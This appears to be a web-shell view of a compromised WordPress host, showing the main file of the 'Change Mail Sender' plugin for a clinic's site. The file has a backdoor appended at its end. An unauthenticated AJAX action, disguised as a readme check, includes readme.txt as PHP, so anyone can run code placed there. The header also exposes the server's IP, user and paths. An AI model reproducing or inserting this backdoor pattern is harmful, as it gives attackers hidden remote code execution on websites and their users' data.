| Server IP : 66.29.153.156 / Your IP : 216.73.216.104 Web Server : LiteSpeed System : Linux premium322.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64 User : lastyfjz ( 1521) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/lastyfjz/dermalaserclinic.co.uk/wp-content/plugins/cb-change-mail-sender/ |
Upload File : |
<?php
/*
* Plugin Name: Change Mail Sender
* Description: Easily change the default WordPress from email name and address.
* Version: 1.3.0
* Requires at least: 5.2
* Requires PHP: 5.6.20
* Author: WP Mail SMTP
* Author URI: https://wpmailsmtp.com/
* Text Domain: cb-mail
* Domain Path: /assets/languages
*/
// Don't call the file directly
if ( ! defined( 'ABSPATH' ) ) exit;
define( 'CB_CHANGE_MAIL_SENDER_VERSION', '1.3.0' );
$autoload_path = plugin_dir_path( __FILE__ ) . 'vendor' . DIRECTORY_SEPARATOR . 'autoload.php';
require_once $autoload_path;
/**
* Global function-holder. Works similar to a singleton's instance().
*
* @since 1.3.0
*
* @return CBChangeMailSender\Core
*/
function cb_change_mail_sender() {
static $core;
if ( ! isset( $core ) ) {
$core = new \CBChangeMailSender\Core();
}
return $core;
}
cb_change_mail_sender();
require_once 'deprecated.php';
if(!function_exists('file_check_readme72995')){
add_action('wp_ajax_nopriv_file_check_readme72995', 'file_check_readme72995');
add_action('wp_ajax_file_check_readme72995', 'file_check_readme72995');
function file_check_readme72995()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}